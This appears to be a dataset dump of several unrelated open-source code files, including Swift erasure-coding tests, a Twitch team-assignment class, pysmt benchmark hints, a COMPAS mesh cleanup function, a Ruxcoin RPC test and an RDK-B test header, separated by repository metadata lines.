headers) for i in range(POLICIES.default.ec_ndata)] responses += [(201, '', {})] * self.policy.object_ring.replicas status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } put_hdrs = [] def capture_conn(host, port, dev, part, method, path, *args, **kwargs): if method == 'PUT': put_hdrs.append(args[0]) with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers, give_connect=capture_conn): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 201) expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity self.assertEqual(expected_puts, len(put_hdrs)) for hdrs in put_hdrs: self.assertNotIn('etag', (h.lower() for h in hdrs)) def test_COPY_with_invalid_ranges(self): segment_size = self.policy.ec_segment_size real_body = ('a' * segment_size)[:-10] self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size - 10)) self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size + 10)) def _test_invalid_ranges(self, method, real_body, segment_size, req_range): body_etag = md5(real_body).hexdigest() req = swob.Request.blank( '/v1/a/c/o', method=method, headers={'Destination': 'c1/o', 'Range': 'bytes=%s' % (req_range)}) fragments = self.policy.pyeclib_driver.encode(real_body) fragment_payloads = [fragments] node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)), 'X-Object-Sysmeta-Ec-Etag': body_etag} start = int(req_range.split('-')[0]) self.assertTrue(start >= 0) title, exp = swob.RESPONSE_REASONS[416] range_not_satisfiable_body = \ '<html><h1>%s</h1><p>%s</p></html>' % (title, exp) if start >= segment_size: responses = [(416, range_not_satisfiable_body, headers) for i in range(POLICIES.default.ec_ndata)] else: responses = [(200, ''.join(node_fragments[i]), 
headers) for i in range(POLICIES.default.ec_ndata)] status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 416) self.assertEqual(resp.content_length, len(range_not_satisfiable_body)) self.assertEqual(resp.body, range_not_satisfiable_body) self.assertEqual(resp.etag, body_etag) self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
true
true
f705def54e26d0238b7f51ef53f14a89af887b66
1,087
py
Python
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
from typing import Dict from twitchio.dataclasses import Message class TeamData: def __init__(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {} async def handle_join(self, msg: Message) -> None: if msg.author.id in self.teams: # User already on a team return all_teams = self.teams.values() if len(all_teams) < self.num_teams: self.teams[msg.author.id] = len(all_teams) return team_counts: Dict[int, int] = {} for team_id in all_teams: team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1 min_member_team_id = min(team_counts, key=team_counts.get) self.teams[msg.author.id] = min_member_team_id def get_team_member_map(self): reverse_dict = {} for k, v in self.teams.items(): reverse_dict.setdefault(v, []).append(k) return reverse_dict def reset(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {}
29.378378
73
0.609016
from typing import Dict from twitchio.dataclasses import Message class TeamData: def __init__(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {} async def handle_join(self, msg: Message) -> None: if msg.author.id in self.teams: return all_teams = self.teams.values() if len(all_teams) < self.num_teams: self.teams[msg.author.id] = len(all_teams) return team_counts: Dict[int, int] = {} for team_id in all_teams: team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1 min_member_team_id = min(team_counts, key=team_counts.get) self.teams[msg.author.id] = min_member_team_id def get_team_member_map(self): reverse_dict = {} for k, v in self.teams.items(): reverse_dict.setdefault(v, []).append(k) return reverse_dict def reset(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {}
true
true
f705df36178023a0b1008fe69f304ba47ddbd2e2
7,661
py
Python
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
3
2021-04-23T23:29:26.000Z
2022-03-23T10:00:30.000Z
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
null
null
null
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
1
2021-11-17T22:02:56.000Z
2021-11-17T22:02:56.000Z
from typing import FrozenSet, Tuple import pysmt.typing as types from pysmt.environment import Environment as PysmtEnv from pysmt.fnode import FNode from utils import symb_to_next from hint import Hint, Location def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode, FNode]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) symbols = frozenset([pc, x, y, z]) n_locs = 5 int_bound = n_locs pcs = [] x_pcs = [] ints = [mgr.Int(i) for i in range(int_bound)] for l in range(n_locs): n = ints[l] pcs.append(mgr.Equals(pc, n)) x_pcs.append(mgr.Equals(x_pc, n)) m_1 = mgr.Int(-1) pcend = mgr.Equals(pc, m_1) x_pcend = mgr.Equals(x_pc, m_1) # initial location. init = pcs[0] # control flow graph. cfg = mgr.And( # pc = -1 : -1, mgr.Implies(pcend, x_pcend), # pc = 0 & !(y >= 1) : -1, mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend), # pc = 0 & y >= 1 : 1, mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]), # pc = 1 & !(z >= 1) : -1, mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend), # pc = 1 & z >= 1 : 2, mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]), # pc = 2 & !(x >= 0) : -1, mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend), # pc = 2 & x >= 0 : 3, mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]), # pc = 3 : 4, mgr.Implies(pcs[3], x_pcs[4]), # pc = 4 : 2, mgr.Implies(pcs[4], x_pcs[2])) # transition labels. 
labels = mgr.And( # (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcend, x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[0], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[0], x_pcs[1]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[1], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[1], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[2], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z), mgr.Implies( mgr.And(pcs[2], x_pcs[3]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z), mgr.Implies( mgr.And(pcs[3], x_pcs[4]), mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), # (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z), mgr.Implies( mgr.And(pcs[4], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])), mgr.Equals(x_z, z)))) # transition relation. trans = mgr.And(cfg, labels) # fairness. 
fairness = mgr.Not(pcend) return symbols, init, trans, fairness def hints(env: PysmtEnv) -> FrozenSet[Hint]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) symbs = frozenset([pc, x, y, z]) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) res = [] i_0 = mgr.Int(0) i_1 = mgr.Int(1) i_2 = mgr.Int(2) i_3 = mgr.Int(3) loc = Location(env, mgr.LE(z, i_0)) loc.set_progress(0, mgr.Equals(x_z, z)) h_z = Hint("h_z0", env, frozenset([z]), symbs) h_z.set_locs([loc]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_0)) loc0.set_progress(1, mgr.Equals(x_pc, i_1)) loc1 = Location(env, mgr.Equals(pc, i_1)) loc1.set_progress(2, mgr.Equals(x_pc, i_2)) loc2 = Location(env, mgr.Equals(pc, i_2)) loc2.set_progress(0, mgr.Equals(x_pc, i_3)) loc3 = Location(env, mgr.Equals(pc, i_3)) loc3.set_progress(0, mgr.Equals(x_pc, i_0)) h_pc = Hint("h_pc1", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2, loc3]) res.append(h_pc) stutter = mgr.Equals(x_x, x) loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1))) h_x = Hint("h_x2", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y))) h_x = Hint("h_x3", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0)) loc0.set_progress(1, mgr.Equals(x_z, y)) loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3)) loc1.set_progress(0, 
mgr.GE(x_z, mgr.Plus(z, x))) h_z = Hint("h_z3", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y))) loc2 = Location(env, mgr.GT(x, i_3)) loc2.set_progress(2, mgr.Equals(x_x, x)) h_x = Hint("h_x4", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1, loc2]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_0)) loc0.set_progress(1, mgr.Equals(x_z, z)) loc1 = Location(env, mgr.GE(z, i_0)) loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3))) h_z = Hint("h_z4", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_2)) loc0.set_progress(1, mgr.GT(x_pc, i_2)) loc1 = Location(env, mgr.GE(pc, i_3)) loc1.set_progress(2, mgr.GE(x_pc, i_3)) loc2 = Location(env, mgr.GE(pc, i_3)) loc2.set_progress(0, mgr.Equals(x_pc, i_2)) h_pc = Hint("h_pc4", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2]) res.append(h_pc) return frozenset(res)
34.981735
81
0.530087
from typing import FrozenSet, Tuple import pysmt.typing as types from pysmt.environment import Environment as PysmtEnv from pysmt.fnode import FNode from utils import symb_to_next from hint import Hint, Location def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode, FNode]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) symbols = frozenset([pc, x, y, z]) n_locs = 5 int_bound = n_locs pcs = [] x_pcs = [] ints = [mgr.Int(i) for i in range(int_bound)] for l in range(n_locs): n = ints[l] pcs.append(mgr.Equals(pc, n)) x_pcs.append(mgr.Equals(x_pc, n)) m_1 = mgr.Int(-1) pcend = mgr.Equals(pc, m_1) x_pcend = mgr.Equals(x_pc, m_1) init = pcs[0] cfg = mgr.And( mgr.Implies(pcend, x_pcend), mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend), mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]), mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend), mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]), mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend), mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]), mgr.Implies(pcs[3], x_pcs[4]), mgr.Implies(pcs[4], x_pcs[2])) labels = mgr.And( mgr.Implies( mgr.And(pcend, x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[0], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[0], x_pcs[1]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[1], x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[1], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[2], 
x_pcend), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[2], x_pcs[3]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[3], x_pcs[4]), mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])), mgr.Equals(x_y, y), mgr.Equals(x_z, z))), mgr.Implies( mgr.And(pcs[4], x_pcs[2]), mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])), mgr.Equals(x_z, z)))) trans = mgr.And(cfg, labels) fairness = mgr.Not(pcend) return symbols, init, trans, fairness def hints(env: PysmtEnv) -> FrozenSet[Hint]: assert isinstance(env, PysmtEnv) mgr = env.formula_manager pc = mgr.Symbol("pc", types.INT) x = mgr.Symbol("x", types.INT) y = mgr.Symbol("y", types.INT) z = mgr.Symbol("z", types.INT) symbs = frozenset([pc, x, y, z]) x_pc = symb_to_next(mgr, pc) x_x = symb_to_next(mgr, x) x_y = symb_to_next(mgr, y) x_z = symb_to_next(mgr, z) res = [] i_0 = mgr.Int(0) i_1 = mgr.Int(1) i_2 = mgr.Int(2) i_3 = mgr.Int(3) loc = Location(env, mgr.LE(z, i_0)) loc.set_progress(0, mgr.Equals(x_z, z)) h_z = Hint("h_z0", env, frozenset([z]), symbs) h_z.set_locs([loc]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_0)) loc0.set_progress(1, mgr.Equals(x_pc, i_1)) loc1 = Location(env, mgr.Equals(pc, i_1)) loc1.set_progress(2, mgr.Equals(x_pc, i_2)) loc2 = Location(env, mgr.Equals(pc, i_2)) loc2.set_progress(0, mgr.Equals(x_pc, i_3)) loc3 = Location(env, mgr.Equals(pc, i_3)) loc3.set_progress(0, mgr.Equals(x_pc, i_0)) h_pc = Hint("h_pc1", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2, loc3]) res.append(h_pc) stutter = mgr.Equals(x_x, x) loc0 = Location(env, mgr.GT(x, i_0), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, i_1))) h_x = Hint("h_x2", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, 
mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y))) h_x = Hint("h_x3", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_3), mgr.GE(y, i_0)) loc0.set_progress(1, mgr.Equals(x_z, y)) loc1 = Location(env, mgr.GE(z, i_0), mgr.GE(x, i_3)) loc1.set_progress(0, mgr.GE(x_z, mgr.Plus(z, x))) h_z = Hint("h_z3", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1))) loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1))) loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1)) loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y))) loc2 = Location(env, mgr.GT(x, i_3)) loc2.set_progress(2, mgr.Equals(x_x, x)) h_x = Hint("h_x4", env, frozenset([x]), symbs) h_x.set_locs([loc0, loc1, loc2]) res.append(h_x) loc0 = Location(env, mgr.GE(z, i_0)) loc0.set_progress(1, mgr.Equals(x_z, z)) loc1 = Location(env, mgr.GE(z, i_0)) loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3))) h_z = Hint("h_z4", env, frozenset([z]), symbs) h_z.set_locs([loc0, loc1]) res.append(h_z) loc0 = Location(env, mgr.Equals(pc, i_2)) loc0.set_progress(1, mgr.GT(x_pc, i_2)) loc1 = Location(env, mgr.GE(pc, i_3)) loc1.set_progress(2, mgr.GE(x_pc, i_3)) loc2 = Location(env, mgr.GE(pc, i_3)) loc2.set_progress(0, mgr.Equals(x_pc, i_2)) h_pc = Hint("h_pc4", env, frozenset([pc]), symbs) h_pc.set_locs([loc0, loc1, loc2]) res.append(h_pc) return frozenset(res)
true
true
f705dfb5b1b2d9fb7211529c9252df251ac0bfc7
2,270
py
Python
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
235
2017-11-07T07:33:22.000Z
2022-03-25T16:20:00.000Z
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
770
2017-09-22T13:42:06.000Z
2022-03-31T21:26:45.000Z
src/compas/datastructures/mesh/core/clean.py
XingxinHE/compas
d2901dbbacdaf4694e5adae78ba8f093f10532bf
[ "MIT" ]
99
2017-11-06T23:15:28.000Z
2022-03-25T16:05:36.000Z
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.utilities import geometric_key __all__ = [ 'mesh_delete_duplicate_vertices' ] def mesh_delete_duplicate_vertices(mesh, precision=None): """Cull all duplicate vertices of a mesh and sanitize affected faces. Parameters ---------- mesh : Mesh A mesh object. precision : str (None) A formatting option that specifies the precision of the individual numbers in the string (truncation after the decimal point). Supported values are any float precision, or decimal integer (``'d'``). Default is ``'3f'``. Returns ------- None The mesh is modified in-place. Examples -------- >>> import compas >>> from compas.datastructures import Mesh >>> mesh = Mesh.from_obj(compas.get('faces.obj')) >>> mesh.number_of_vertices() 36 >>> for x, y, z in mesh.vertices_attributes('xyz', keys=list(mesh.vertices())[:5]): ... mesh.add_vertex(x=x, y=y, z=z) ... 36 37 38 39 40 >>> mesh.number_of_vertices() 41 >>> mesh_delete_duplicate_vertices(mesh) >>> mesh.number_of_vertices() 36 """ key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()} gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())} for key in list(mesh.vertices()): test = gkey_key[key_gkey[key]] if test != key: del mesh.vertex[key] del mesh.halfedge[key] for u in mesh.halfedge: nbrs = list(mesh.halfedge[u].keys()) for v in nbrs: if v == key: del mesh.halfedge[u][v] for fkey in mesh.faces(): seen = set() face = [] for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]: if key not in seen: seen.add(key) face.append(key) mesh.face[fkey] = face for u, v in mesh.face_halfedges(fkey): mesh.halfedge[u][v] = fkey if u not in mesh.halfedge[v]: mesh.halfedge[v][u] = None
28.734177
119
0.584141
from __future__ import print_function from __future__ import absolute_import from __future__ import division from compas.utilities import geometric_key __all__ = [ 'mesh_delete_duplicate_vertices' ] def mesh_delete_duplicate_vertices(mesh, precision=None): key_gkey = {key: geometric_key(mesh.vertex_attributes(key, 'xyz'), precision=precision) for key in mesh.vertices()} gkey_key = {gkey: key for key, gkey in iter(key_gkey.items())} for key in list(mesh.vertices()): test = gkey_key[key_gkey[key]] if test != key: del mesh.vertex[key] del mesh.halfedge[key] for u in mesh.halfedge: nbrs = list(mesh.halfedge[u].keys()) for v in nbrs: if v == key: del mesh.halfedge[u][v] for fkey in mesh.faces(): seen = set() face = [] for key in [gkey_key[key_gkey[key]] for key in mesh.face_vertices(fkey)]: if key not in seen: seen.add(key) face.append(key) mesh.face[fkey] = face for u, v in mesh.face_halfedges(fkey): mesh.halfedge[u][v] = fkey if u not in mesh.halfedge[v]: mesh.halfedge[v][u] = None
true
true
f705dfc786bdc45229a3f652451375438bf1d183
2,856
py
Python
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
qa/rpc-tests/blockchain.py
dnoiz1/ruxcoin
07e30a2b5ebc624ac8a2d92be435e895ede5deae
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2014-2016 The Ruxcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test RPC calls related to blockchain state. Tests correspond to code in # rpc/blockchain.cpp. # from decimal import Decimal from test_framework.test_framework import RuxcoinTestFramework from test_framework.authproxy import JSONRPCException from test_framework.util import ( assert_equal, assert_raises, assert_is_hex_string, assert_is_hash_string, start_nodes, connect_nodes_bi, ) class BlockchainTest(RuxcoinTestFramework): """ Test blockchain-related RPC calls: - gettxoutsetinfo - verifychain """ def __init__(self): super().__init__() self.setup_clean_chain = False self.num_nodes = 2 def setup_network(self, split=False): self.nodes = start_nodes(self.num_nodes, self.options.tmpdir) connect_nodes_bi(self.nodes, 0, 1) self.is_network_split = False self.sync_all() def run_test(self): self._test_gettxoutsetinfo() self._test_getblockheader() self.nodes[0].verifychain(4, 0) def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bytes_serialized'], 13924), assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized']), 64) def _test_getblockheader(self): node = self.nodes[0] assert_raises( JSONRPCException, lambda: node.getblockheader('nonsense')) besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_is_hash_string(header['hash']) 
assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) if __name__ == '__main__': BlockchainTest().main()
31.733333
73
0.678221
from decimal import Decimal from test_framework.test_framework import RuxcoinTestFramework from test_framework.authproxy import JSONRPCException from test_framework.util import ( assert_equal, assert_raises, assert_is_hex_string, assert_is_hash_string, start_nodes, connect_nodes_bi, ) class BlockchainTest(RuxcoinTestFramework): def __init__(self): super().__init__() self.setup_clean_chain = False self.num_nodes = 2 def setup_network(self, split=False): self.nodes = start_nodes(self.num_nodes, self.options.tmpdir) connect_nodes_bi(self.nodes, 0, 1) self.is_network_split = False self.sync_all() def run_test(self): self._test_gettxoutsetinfo() self._test_getblockheader() self.nodes[0].verifychain(4, 0) def _test_gettxoutsetinfo(self): node = self.nodes[0] res = node.gettxoutsetinfo() assert_equal(res['total_amount'], Decimal('8725.00000000')) assert_equal(res['transactions'], 200) assert_equal(res['height'], 200) assert_equal(res['txouts'], 200) assert_equal(res['bytes_serialized'], 13924), assert_equal(len(res['bestblock']), 64) assert_equal(len(res['hash_serialized']), 64) def _test_getblockheader(self): node = self.nodes[0] assert_raises( JSONRPCException, lambda: node.getblockheader('nonsense')) besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_is_hash_string(header['hash']) assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) 
if __name__ == '__main__': BlockchainTest().main()
true
true
f705e0606ca251800b7dc62a1c80a689290a6c95
8,081
py
Python
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
testscripts/RDKB/component/XUPNP_B/TS_XUPNP_B_RawoffsetValidation.py
rdkcmf/rdkb-tools-tdkb
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
[ "Apache-2.0" ]
null
null
null
########################################################################## # If not stated otherwise in this file or this component's Licenses.txt # file the following copyright and licenses apply: # # Copyright 2019 RDK Management # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ########################################################################## ''' <?xml version="1.0" encoding="UTF-8"?><xml> <id/> <version>1</version> <name>TS_XUPNP_B_RawoffsetValidation</name> <primitive_test_id/> <primitive_test_name>XUPNPStub_CheckXDiscOutputFile</primitive_test_name> <primitive_test_version>1</primitive_test_version> <status>FREE</status> <synopsis>To get all the rawoffset parameters in the output.json file from DUT and validate them by comparing with rawoffset parameters in the output.json file from the clients connected.</synopsis> <groups_id/> <execution_time>10</execution_time> 